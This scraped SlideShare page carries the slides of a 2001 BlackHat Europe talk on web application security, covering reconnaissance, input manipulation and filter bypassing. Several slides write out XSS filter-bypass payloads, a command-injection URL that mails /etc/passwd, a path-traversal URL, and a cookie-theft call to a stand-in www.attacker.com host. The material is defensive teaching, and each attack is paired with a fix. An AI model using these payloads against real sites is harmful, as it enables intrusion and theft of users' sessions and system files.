SlideShare a Scribd company logo

Bh europe-01-grossman

Download as PPT, PDF
A
aniba2000

web application

1 of 40
Web Application Security "The Land that Information Security Forgot." BlackHat Europe 2001 Jeremiah Grossman jeremiah@whitehatsec.com WhiteHat Security www.whitehatsec.com 2001(c)WhiteHat Security, Inc.
Topics Web Application Security Landscape Common Web Application Security Mistakes Web Application Attack Methodologies  Information & Discovery  Input Manipulation/Parameter Tampering  Authentication/Authorization  System Mis-Configurations
What is a Web Application?  A web application or web service is a software application that is accessible using a web browser or HTTP(s) user agent. 2001(c)WhiteHat Security, Inc.
LAYERS 2001(c)WhiteHat Security, Inc.
What is Web Application Security? Simply, Web Application Security is... “The securing of web applications.” 2001(c)WhiteHat Security, Inc.
FIREWALL 2001(c)WhiteHat Security, Inc.
SSL 2001(c)WhiteHat Security, Inc.
Common Web Application Security Mistakes 2001(c)WhiteHat Security, Inc.
Trusting Client-Side Data DO NOT TRUST CLIENT-SIDE DATA! Identify all input parameters that trust client-side data. 2001(c)WhiteHat Security, Inc.
Unescaped Special Characters ! @ $ % ^ & * ( ) -_ + ` ~ | [ ] { } ; : ' " ? / , . > < Check for: Unescaped special characters within input strings 2001(c)WhiteHat Security, Inc.
HTML Character Filtering Proper handling of special characters > => &gt; < => &lt; " => &quot; & => &amp; Null characters should all be removed. %00 2001(c)WhiteHat Security, Inc.
More mistakes… Authentication mechanisms using technologies such as JavaScript or ActiveX. Lack of re-authenticating the user before issuing new passwords or performing critical tasks. Hosting of uncontrolled data on a protected domain. 2001(c)WhiteHat Security, Inc.
Information & Discovery  Spidering/Site Crawling  Identifiable Characteristics  Errors and Response Codes  File/Application Enumeration  Network Reconnaissance 2001(c)WhiteHat Security, Inc.
Spidering/Site Crawling  Site Map  Hidden Services  Service Map  CGI's and Forms  Documentation  Email addresses Tools: WGET http://www.gnu.org/software/wget/wget.html 2001(c)WhiteHat Security, Inc.
Identifiable Characteristics  Comment Lines  URL Extensions  Meta Tags  Cookies  Client-Side scripting languages 2001(c)WhiteHat Security, Inc.
Error and Response Codes HTTP Response Headers Error Messages 2001(c)WhiteHat Security, Inc.
File/Application Enumeration Commonly referred to as “forced browsing” or “CGI Scanning”. Directory Browsing Index Listings Tools: Whisker http://www.wiretrip.net/rfp/p/doc.asp/i2/d21.htm 2001(c)WhiteHat Security, Inc.
Network Reconnaissance WHOIS ARIN http://www.arin.net/whois/index.html Port Scan Nmap http://www.insecure.org/nmap/index.html Traceroute Ping Scan (Nmap or HPING) http://www.hping.org/ NSLookup/ Reverse DNS DNS Zone Transfer (DIG) 2001(c)WhiteHat Security, Inc.
Input Manipulation Parameter Tampering "Twiddling Bits."  Cross-Site Scripting  Filter-Bypass Manipulation  OS Commands  Meta Characters  Path/Directory Traversal  Hidden Form Field Manipulation  HTTP Headers 2001(c)WhiteHat Security, Inc.
Cross-Site Scripting Bad name given to a dangerous security issue Attack targets the user of the system rather than the system itself. Outside client-side languages executing within the users web environment with the same level of privilege as the hosted site. 2001(c)WhiteHat Security, Inc.
Client-Side Scripting Languages DHTML (HTML, XHTML, HTML x.0) JavaScript (1.x) Java (Applets) VBScript Flash ActiveX XML/XSL CSS 2001(c)WhiteHat Security, Inc.
Accessing the DOM & Outside the DOM Document Object Model (DOM) Client-Side languages possess an enormous amount of power to access and manipulate the DOM within a browser. Complex & diverse interconnections create an increased the level of access within the DOM. Increased level of access to read & modify DOM data ranging anything from background colors, to a file on your systems, and beyond to executing systems calls. 2001(c)WhiteHat Security, Inc.
CSS Danger “The Remote Launch Pad.” Successfully CSS a user via a protected domain. Utilizing a Client-Side utility (JavaScript, ActiveX, VBScript, etc.), exploit a browser hole to download a trojan/virus. User is unknowingly infected/compromised within a single HTTP page load.
Dangerous HTML “it’s all bad.” <APPLET> <BODY> <EMBED> <FRAME> <FRAMESET> <HTML> <IFRAME> <IMG> <LAYER> <ILAYER> <META> <OBJECT> <SCRIPT> <STYLE> ATTRIBUTE DANGER LIST (Any HTML Tag that has these attributes) STYLE SRC HREF TYPE 2001(c)WhiteHat Security, Inc.
Filter Bypassing "JavaScript is a Cockroach" There are all kinds of input filters web applications implement to sanitize data. This section will demonstrate many known ways input filter's can be bypassed to perform malicious functions such as, cross-scripting, browser-hijacking, cookie theft, and others. Client-Side Scripting (CSS) attacks require the execution of either, JavaScript, Java, VBScript, ActiveX, Flash and some others. We will be assuming that these web applications accept HTML, at least in a limited sense. 2001(c)WhiteHat Security, Inc.
Testing the Filters Submit all the raw HTML tags you can find, and then view the output results. Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript Event Handler). This will show what HTML is allowed, what the changes were, and possible what dangerous HTML can be exploited. 2001(c)WhiteHat Security, Inc.
SCRIPT TAG Description: The script tag is the simplest form of inputting JavaScript Exploit: <SCRIPT>alert('JavaScript Executed');</SCRIPT> Solution: replace all "script" tags. 2001(c)WhiteHat Security, Inc.
SRCing JavaScript Protocol Description: The JavaScript protocol will execute the expression entered after the colon. Netscape Tested. Exploit: <IMG SRC="javascript:alert('JavaScriptExecuted');"> Solution: Replace "javascript" strings in all SRC & HREF attributes in HTML tags with another string. Exp: <IMG SRC="java_script:alert('JavaScript Executed');"> will render this script useless. Further Information: Any HTML tag with a SRC attribute will execute this script on page load or on link activation. As a further protocol pattern matching, keywords "livescript" and "mocha" must be also replaced for the hold the same possibilities. *** Netscape code names *** 2001(c)WhiteHat Security, Inc.
SRCing JavaScript Protocol w/ HTML Entities Description: As another derivative of the previous, Decimal HTML entities within these strings can cause filter bypass. Exploit: <IMG SRC="javasc&#09;ript:alert('JavaScript Executed');"> Replacement of entities 10 - 11 - 12 - 13 will also succeed. Hex instead of Decimal HTML entities will also bypass input filters and execute. <IMG SRC="javasc&#X0A;ript:alert('JavaScript Executed');"> As well as placing multiple ZERO's in front. <IMG SRC=javasc&#000010;ript:alert('JavaScript Executed');> Solution: Filter these entities within the string then do your further pattern matching 2001(c)WhiteHat Security, Inc.
AND CURLY Description: Obscure Netscape JavaScript execution line. Exact syntax is needed to execute. Exploit: <IMG SRC="&{alert('JavaScript Executed')};"> Solution: <IMG SRC="XXalert('JavaScript Executed')};"> or something similar will nullify the problem. 2001(c)WhiteHat Security, Inc.
Style Tag Conversion Description: Turn a style tag into a JavaScript expression. Exploit: <style TYPE="text/javascript">JS EXPRESSION</style> Solution: Replace the "javascript" string with "java_script" and all should be fine. Exploit: Import dangerous CSS. <STYLE type=text/css> @import url(http://server/very_bad.css); </STYLE> Solution: Filter and replace the "@import“ Exploit: Import a JavaScript Expression through a style tag. <style TYPE="text/css"> @import url(javascript:alert('JavaScript Executed')); IE HOLE </style> Solution: Again, filter and replace the "@import" and the "javascript:" just to be safe. 2001(c)WhiteHat Security, Inc.
Twiddling Bits OS Commands Meta Characters Path/Directory Traversal 2001(c)WhiteHat Security, Inc.
Power of the Semi-Colon piping input to the command line. OS Commands Normal: http://foo.com/app.cgi?email=none@foo.com Altered: http://foo.com/app.cgi?email=none@foo.com;+sendmail+/etc/passwd Shell pipes and re-directs can also be used.
Power of the Semi-Colon piping input to the command line. Meta Characters Normal: http://foo.com/app.cgi?list=file.txt Altered: http://foo.com/app.cgi?list=*
Power of the Semi-Colon piping input to the command line. Path Directory Traversal Normal: http://foo.com/app.cgi?directory=/path/to/data Altered: http://foo.com/app.cgi?directory=path/to/data../../../../../../etc
More bits… Hidden Form Field Manipulation HTTP Headers 2001(c)WhiteHat Security, Inc.
Authentication/Authorization “Hand in the cookie jar.” Cookies are restricted to domains (.acme.com) Uncontrolled data on a restricted domain can access the cookie data. JavaScript Expression: "document.cookie" window.open document.img.src Hidden Form Submit www.attacker.com/cgi-bin/cookie_thieft.pl?COOKIEDATA Cookie data is passed to a CGI through a GET request to a off domain host. 2001(c)WhiteHat Security, Inc.
System Mis-Configurations “patches, patches, and more patches…" Vendor Patches Default Accounts Check: Web Server permission by directory browsing Software version from Discovery Known default accounts in commercial platforms BugTraq Anonymous FTP open on Web Server 2001(c)WhiteHat Security, Inc.
Introducing OWASP Open Web Application Security Project http://www.owasp.org The "Open Web Application Security Project" or OWASP is a community effort focused on defining Recommendations, Specifications and Methodologies for Designing, Developing, Deploying and Testing the security of web enabled applications or web services. The "Open Web Application Security Project" or OWASP is based on an idea from the participants of the www- mobile-code mailing list at securityfocus.com You can join the mailing list by visiting www.securityfocus.com. 2001(c)WhiteHat Security, Inc.
Thank You. Questions? Jeremiah Grossman · · Jeremiah@whitehatsec.com · WhiteHat Security · www.whitehatsec.com

Recommended

Peeples authentication authorization_services_with_saml_xacml_with_jboss_eap6
Peeples authentication authorization_services_with_saml_xacml_with_jboss_eap6Peeples authentication authorization_services_with_saml_xacml_with_jboss_eap6
Peeples authentication authorization_services_with_saml_xacml_with_jboss_eap6Kenneth Peeples
 
From 0 to Spring Security 4.0
From 0 to Spring Security 4.0From 0 to Spring Security 4.0
From 0 to Spring Security 4.0robwinch
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013Edouard de Lansalut
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientAngelo Dell'Aera
 
Deciphering 'Claims-based Identity'
Deciphering 'Claims-based Identity'Deciphering 'Claims-based Identity'
Deciphering 'Claims-based Identity'Oliver Pfaff
 
DC612 Day - Web Application Security: OWASP Top 10
DC612 Day - Web Application Security: OWASP Top 10DC612 Day - Web Application Security: OWASP Top 10
DC612 Day - Web Application Security: OWASP Top 10dc612
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Introduction to PicketLink
Introduction to PicketLinkIntroduction to PicketLink
Introduction to PicketLinkJBUG London
 

Recommended

Peeples authentication authorization_services_with_saml_xacml_with_jboss_eap6
Peeples authentication authorization_services_with_saml_xacml_with_jboss_eap6Peeples authentication authorization_services_with_saml_xacml_with_jboss_eap6
Peeples authentication authorization_services_with_saml_xacml_with_jboss_eap6Kenneth Peeples
 
From 0 to Spring Security 4.0
From 0 to Spring Security 4.0From 0 to Spring Security 4.0
From 0 to Spring Security 4.0robwinch
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013Edouard de Lansalut
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientAngelo Dell'Aera
 
Deciphering 'Claims-based Identity'
Deciphering 'Claims-based Identity'Deciphering 'Claims-based Identity'
Deciphering 'Claims-based Identity'Oliver Pfaff
 
DC612 Day - Web Application Security: OWASP Top 10
DC612 Day - Web Application Security: OWASP Top 10DC612 Day - Web Application Security: OWASP Top 10
DC612 Day - Web Application Security: OWASP Top 10dc612
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Introduction to PicketLink
Introduction to PicketLinkIntroduction to PicketLink
Introduction to PicketLinkJBUG London
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
SAML and Other Types of Federation for Your Enterprise
SAML and Other Types of Federation for Your EnterpriseSAML and Other Types of Federation for Your Enterprise
SAML and Other Types of Federation for Your EnterpriseDenis Gundarev
 
MongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB
 
Spring Roo Rev005
Spring Roo Rev005Spring Roo Rev005
Spring Roo Rev005Rich Helton
 
JavaEE Security
JavaEE SecurityJavaEE Security
JavaEE SecurityAlex Kim
 
Developing With JAAS
Developing With JAASDeveloping With JAAS
Developing With JAASrahmed_sct
 
Java EE Application Security With PicketLink
Java EE Application Security With PicketLinkJava EE Application Security With PicketLink
Java EE Application Security With PicketLinkpigorcraveiro
 
Webauthn Tutorial
Webauthn TutorialWebauthn Tutorial
Webauthn TutorialFIDO Alliance
 
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry BuzdinModern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry BuzdinJava User Group Latvia
 
Securing Applications With Picketlink
Securing Applications With PicketlinkSecuring Applications With Picketlink
Securing Applications With PicketlinkAnil Saldanha
 
Secure visual algorithm simulator
Secure visual algorithm simulatorSecure visual algorithm simulator
Secure visual algorithm simulatorPrachi Singhal
 
Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015Alvaro Sanchez-Mariscal
 
SCWCD : Secure web
SCWCD : Secure webSCWCD : Secure web
SCWCD : Secure webBen Abdallah Helmi
 
Stateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTStateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTGaurav Roy
 
Enterprise Security API (ESAPI) Java - Java User Group San Antonio
Enterprise Security API (ESAPI) Java - Java User Group San AntonioEnterprise Security API (ESAPI) Java - Java User Group San Antonio
Enterprise Security API (ESAPI) Java - Java User Group San AntonioDenim Group
 
OAuth2 and Spring Security
OAuth2 and Spring SecurityOAuth2 and Spring Security
OAuth2 and Spring SecurityOrest Ivasiv
 
BHUSA 2021 - Cloud with a Chance of APT
BHUSA 2021 - Cloud with a Chance of APTBHUSA 2021 - Cloud with a Chance of APT
BHUSA 2021 - Cloud with a Chance of APTDouglas Bienstock
 
FIDO2 Specifications Overview
FIDO2 Specifications OverviewFIDO2 Specifications Overview
FIDO2 Specifications OverviewFIDO Alliance
 
Web app security - owasp top 10
Web app security - owasp top 10Web app security - owasp top 10
Web app security - owasp top 10Digicomp Academy AG
 
Security in java ee platform: what is included, what is missing
Security in java ee platform: what is included, what is missingSecurity in java ee platform: what is included, what is missing
Security in java ee platform: what is included, what is missingMasoud Kalali
 
Гончаров ТОП КЛУБ РУС 04.12.12
Гончаров ТОП КЛУБ РУС 04.12.12Гончаров ТОП КЛУБ РУС 04.12.12
Гончаров ТОП КЛУБ РУС 04.12.12Kirill Goncharov
 
Pientä perintäfaktaa
Pientä perintäfaktaaPientä perintäfaktaa
Pientä perintäfaktaaCasa JK Oy / Casa Perintä
 

More Related Content

What's hot

Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
SAML and Other Types of Federation for Your Enterprise
SAML and Other Types of Federation for Your EnterpriseSAML and Other Types of Federation for Your Enterprise
SAML and Other Types of Federation for Your EnterpriseDenis Gundarev
 
MongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB
 
Spring Roo Rev005
Spring Roo Rev005Spring Roo Rev005
Spring Roo Rev005Rich Helton
 
JavaEE Security
JavaEE SecurityJavaEE Security
JavaEE SecurityAlex Kim
 
Developing With JAAS
Developing With JAASDeveloping With JAAS
Developing With JAASrahmed_sct
 
Java EE Application Security With PicketLink
Java EE Application Security With PicketLinkJava EE Application Security With PicketLink
Java EE Application Security With PicketLinkpigorcraveiro
 
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry BuzdinModern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry BuzdinJava User Group Latvia
 
Securing Applications With Picketlink
Securing Applications With PicketlinkSecuring Applications With Picketlink
Securing Applications With PicketlinkAnil Saldanha
 
Secure visual algorithm simulator
Secure visual algorithm simulatorSecure visual algorithm simulator
Secure visual algorithm simulatorPrachi Singhal
 
Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015Alvaro Sanchez-Mariscal
 
Stateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTStateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTGaurav Roy
 
Enterprise Security API (ESAPI) Java - Java User Group San Antonio
Enterprise Security API (ESAPI) Java - Java User Group San AntonioEnterprise Security API (ESAPI) Java - Java User Group San Antonio
Enterprise Security API (ESAPI) Java - Java User Group San AntonioDenim Group
 
OAuth2 and Spring Security
OAuth2 and Spring SecurityOAuth2 and Spring Security
OAuth2 and Spring SecurityOrest Ivasiv
 
BHUSA 2021 - Cloud with a Chance of APT
BHUSA 2021 - Cloud with a Chance of APTBHUSA 2021 - Cloud with a Chance of APT
BHUSA 2021 - Cloud with a Chance of APTDouglas Bienstock
 
FIDO2 Specifications Overview
FIDO2 Specifications OverviewFIDO2 Specifications Overview
FIDO2 Specifications OverviewFIDO Alliance
 
Security in java ee platform: what is included, what is missing
Security in java ee platform: what is included, what is missingSecurity in java ee platform: what is included, what is missing
Security in java ee platform: what is included, what is missingMasoud Kalali
 

What's hot (20)

Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
SAML and Other Types of Federation for Your Enterprise
SAML and Other Types of Federation for Your EnterpriseSAML and Other Types of Federation for Your Enterprise
SAML and Other Types of Federation for Your Enterprise
 
MongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDB
 
Spring Roo Rev005
Spring Roo Rev005Spring Roo Rev005
Spring Roo Rev005
 
JavaEE Security
JavaEE SecurityJavaEE Security
JavaEE Security
 
Developing With JAAS
Developing With JAASDeveloping With JAAS
Developing With JAAS
 
Java EE Application Security With PicketLink
Java EE Application Security With PicketLinkJava EE Application Security With PicketLink
Java EE Application Security With PicketLink
 
Webauthn Tutorial
Webauthn TutorialWebauthn Tutorial
Webauthn Tutorial
 
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry BuzdinModern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
 
Securing Applications With Picketlink
Securing Applications With PicketlinkSecuring Applications With Picketlink
Securing Applications With Picketlink
 
Secure visual algorithm simulator
Secure visual algorithm simulatorSecure visual algorithm simulator
Secure visual algorithm simulator
 
Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015
 
SCWCD : Secure web
SCWCD : Secure webSCWCD : Secure web
SCWCD : Secure web
 
Stateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWTStateless Auth using OAuth2 & JWT
Stateless Auth using OAuth2 & JWT
 
Enterprise Security API (ESAPI) Java - Java User Group San Antonio
Enterprise Security API (ESAPI) Java - Java User Group San AntonioEnterprise Security API (ESAPI) Java - Java User Group San Antonio
Enterprise Security API (ESAPI) Java - Java User Group San Antonio
 
OAuth2 and Spring Security
OAuth2 and Spring SecurityOAuth2 and Spring Security
OAuth2 and Spring Security
 
BHUSA 2021 - Cloud with a Chance of APT
BHUSA 2021 - Cloud with a Chance of APTBHUSA 2021 - Cloud with a Chance of APT
BHUSA 2021 - Cloud with a Chance of APT
 
FIDO2 Specifications Overview
FIDO2 Specifications OverviewFIDO2 Specifications Overview
FIDO2 Specifications Overview
 
Web app security - owasp top 10
Web app security - owasp top 10Web app security - owasp top 10
Web app security - owasp top 10
 
Security in java ee platform: what is included, what is missing
Security in java ee platform: what is included, what is missingSecurity in java ee platform: what is included, what is missing
Security in java ee platform: what is included, what is missing
 

Viewers also liked

Гончаров ТОП КЛУБ РУС 04.12.12
Гончаров ТОП КЛУБ РУС 04.12.12Гончаров ТОП КЛУБ РУС 04.12.12
Гончаров ТОП КЛУБ РУС 04.12.12Kirill Goncharov
 
The Numeral - Числительное
The Numeral - ЧислительноеThe Numeral - Числительное
The Numeral - ЧислительноеMr Intenglish
 
Kako redizajnom telefonskih govornica unaprijediti turizam?
Kako redizajnom telefonskih govornica unaprijediti turizam?Kako redizajnom telefonskih govornica unaprijediti turizam?
Kako redizajnom telefonskih govornica unaprijediti turizam?Ivana Preiss
 
м.горький. раннее творчество. пьеса на дне
м.горький. раннее творчество. пьеса на днем.горький. раннее творчество. пьеса на дне
м.горький. раннее творчество. пьеса на днеNatalya Dyrda
 
пьеса м.горького на дне
пьеса м.горького на днепьеса м.горького на дне
пьеса м.горького на днеNatalya Dyrda
 
Ilmu Sosial Budaya Dasar - Komodifikasi Budaya Bali
Ilmu Sosial Budaya Dasar - Komodifikasi Budaya BaliIlmu Sosial Budaya Dasar - Komodifikasi Budaya Bali
Ilmu Sosial Budaya Dasar - Komodifikasi Budaya BaliMargii Utamii
 
Creating environments of inclusion for all children
Creating environments of inclusion for all childrenCreating environments of inclusion for all children
Creating environments of inclusion for all childrenbritnificent
 
Suport curs tic matematica
Suport curs tic matematicaSuport curs tic matematica
Suport curs tic matematicavaliobagiu
 
EECU JA in a Day
EECU JA in a DayEECU JA in a Day
EECU JA in a Dayeecudfw
 
What social media success looks like in tourism Kaldis YouTect
What social media success looks like in tourism Kaldis YouTectWhat social media success looks like in tourism Kaldis YouTect
What social media success looks like in tourism Kaldis YouTectMark Frary
 
Imaginem i construim
Imaginem i construimImaginem i construim
Imaginem i construimMercè Gimeno
 
Psicomotricitat al pati 1
Psicomotricitat al pati 1Psicomotricitat al pati 1
Psicomotricitat al pati 1Mercè Gimeno
 

Viewers also liked (20)

Гончаров ТОП КЛУБ РУС 04.12.12
Гончаров ТОП КЛУБ РУС 04.12.12Гончаров ТОП КЛУБ РУС 04.12.12
Гончаров ТОП КЛУБ РУС 04.12.12
 
Pientä perintäfaktaa
Pientä perintäfaktaaPientä perintäfaktaa
Pientä perintäfaktaa
 
Omonimia
OmonimiaOmonimia
Omonimia
 
Cswa
CswaCswa
Cswa
 
The Numeral - Числительное
The Numeral - ЧислительноеThe Numeral - Числительное
The Numeral - Числительное
 
Kako redizajnom telefonskih govornica unaprijediti turizam?
Kako redizajnom telefonskih govornica unaprijediti turizam?Kako redizajnom telefonskih govornica unaprijediti turizam?
Kako redizajnom telefonskih govornica unaprijediti turizam?
 
м.горький. раннее творчество. пьеса на дне
м.горький. раннее творчество. пьеса на днем.горький. раннее творчество. пьеса на дне
м.горький. раннее творчество. пьеса на дне
 
пьеса м.горького на дне
пьеса м.горького на днепьеса м.горького на дне
пьеса м.горького на дне
 
Ilmu Sosial Budaya Dasar - Komodifikasi Budaya Bali
Ilmu Sosial Budaya Dasar - Komodifikasi Budaya BaliIlmu Sosial Budaya Dasar - Komodifikasi Budaya Bali
Ilmu Sosial Budaya Dasar - Komodifikasi Budaya Bali
 
Wiki informe 5
Wiki informe 5Wiki informe 5
Wiki informe 5
 
Creating environments of inclusion for all children
Creating environments of inclusion for all childrenCreating environments of inclusion for all children
Creating environments of inclusion for all children
 
Giác ngộ
Giác ngộGiác ngộ
Giác ngộ
 
BLAZQUEZ M (2014) Nuevas soluciones para la evaluación de los riesgos de los...
BLAZQUEZ M (2014) Nuevas soluciones para la evaluación de los riesgos de los...BLAZQUEZ M (2014) Nuevas soluciones para la evaluación de los riesgos de los...
BLAZQUEZ M (2014) Nuevas soluciones para la evaluación de los riesgos de los...
 
Suport curs tic matematica
Suport curs tic matematicaSuport curs tic matematica
Suport curs tic matematica
 
EECU JA in a Day
EECU JA in a DayEECU JA in a Day
EECU JA in a Day
 
What social media success looks like in tourism Kaldis YouTect
What social media success looks like in tourism Kaldis YouTectWhat social media success looks like in tourism Kaldis YouTect
What social media success looks like in tourism Kaldis YouTect
 
Imaginem i construim
Imaginem i construimImaginem i construim
Imaginem i construim
 
Psicomotricitat al pati 1
Psicomotricitat al pati 1Psicomotricitat al pati 1
Psicomotricitat al pati 1
 
Moments 1
Moments 1Moments 1
Moments 1
 
Wiki
WikiWiki
Wiki
 

Similar to Bh europe-01-grossman

Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotJeremiah Grossman
 
Web Application Security and Release of "WhiteHat Arsenal"
Web Application Security and Release of "WhiteHat Arsenal"Web Application Security and Release of "WhiteHat Arsenal"
Web Application Security and Release of "WhiteHat Arsenal"Jeremiah Grossman
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Jeremiah Grossman
 
Minor Mistakes In Web Portals
Minor Mistakes In Web PortalsMinor Mistakes In Web Portals
Minor Mistakes In Web Portalsmsobiegraj
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Matt Johansen
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Jeremiah Grossman
 
DevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityDevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityCoverity
 
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...ufpb
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defenseamiable_indian
 
Application Security
Application SecurityApplication Security
Application Securitynirola
 
Meetup DotNetCode Owasp
Meetup DotNetCode Owasp Meetup DotNetCode Owasp
Meetup DotNetCode Owasp dotnetcode
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...CODE BLUE
 
Cross interface attack
Cross interface attackCross interface attack
Cross interface attackpiyushml20
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Shreeraj Shah
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysqqlan
 
DODN2009 - Jump Start Silverlight
DODN2009 - Jump Start SilverlightDODN2009 - Jump Start Silverlight
DODN2009 - Jump Start SilverlightClint Edmonson
 
Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Top Ten Web Hacking Techniques (2008)
Top Ten Web Hacking Techniques (2008)Jeremiah Grossman
 

Similar to Bh europe-01-grossman (20)

Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security Forgot
 
Web Application Security and Release of "WhiteHat Arsenal"
Web Application Security and Release of "WhiteHat Arsenal"Web Application Security and Release of "WhiteHat Arsenal"
Web Application Security and Release of "WhiteHat Arsenal"
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
 
Minor Mistakes In Web Portals
Minor Mistakes In Web PortalsMinor Mistakes In Web Portals
Minor Mistakes In Web Portals
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012
 
DevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityDevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first Security
 
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defense
 
Application Security
Application SecurityApplication Security
Application Security
 
Security Tech Talk
Security Tech TalkSecurity Tech Talk
Security Tech Talk
 
Meetup DotNetCode Owasp
Meetup DotNetCode Owasp Meetup DotNetCode Owasp
Meetup DotNetCode Owasp
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
 
Cross Interface Attacks
Cross Interface AttacksCross Interface Attacks
Cross Interface Attacks
 
Cross interface attack
Cross interface attackCross interface attack
Cross interface attack
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
